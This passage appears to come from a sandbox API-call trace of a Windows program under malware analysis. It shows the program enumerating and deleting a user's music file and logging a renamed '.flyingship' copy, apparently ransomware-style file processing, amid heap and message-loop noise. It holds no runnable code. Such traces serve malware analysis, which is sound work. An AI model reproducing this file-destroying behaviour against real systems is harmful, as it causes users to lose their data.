nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", lpFilePart=0x0) returned 0x57 [0181.787] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0x11a031c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 0x90ae18 [0181.787] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aduuj\\axe49w4a sjdn r.mp3")) returned 1 [0181.789] FindNextFileW (in: hFindFile=0x90ae18, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96d1f10, ftCreationTime.dwHighDateTime=0x1d5ddcd, ftLastAccessTime.dwLowDateTime=0xc516f910, ftLastAccessTime.dwHighDateTime=0x1d5e463, ftLastWriteTime.dwLowDateTime=0x11a031c0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0xcb34, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="AXe49W4a SJDN r.mp3", cAlternateFileName="AXE49W~1.MP3")) returned 0 [0181.789] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0181.790] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0181.790] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.791] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0181.791] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0181.791] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0181.791] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.791] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.791] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.791] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0181.791] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0181.792] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.792] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0181.792] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.793] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0181.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0181.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0181.794] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0181.794] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1e88, lpOverlapped=0x0) returned 1 [0181.794] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0181.794] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1e88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0181.794] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0181.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0181.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0181.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3\r\n", cchWideChar=101, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 101 [0181.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x65) returned 0x8e8320 [0181.794] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3\r\n", cchWideChar=101, lpMultiByteStr=0x8e8320, cbMultiByte=101, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\ADuuj\\AXe49W4a SJDN r.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 101 [0181.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0181.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0181.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0181.795] WriteFile (in: hFile=0x138, lpBuffer=0x906f38*, nNumberOfBytesToWrite=0x64, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x906f38*, lpNumberOfBytesWritten=0x87f43c*=0x64, lpOverlapped=0x0) returned 1 [0181.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0181.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0181.795] CloseHandle (hObject=0x138) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0181.796] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0181.798] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0181.798] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3540 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0181.798] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.799] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.800] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0181.800] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.800] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.800] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1890 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0181.800] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0181.800] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0181.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0181.801] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0181.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0181.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0181.801] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.801] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0181.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0181.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0181.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.802] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0181.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0181.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0181.802] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0181.803] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0181.803] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0181.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0181.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0181.804] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0181.804] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: 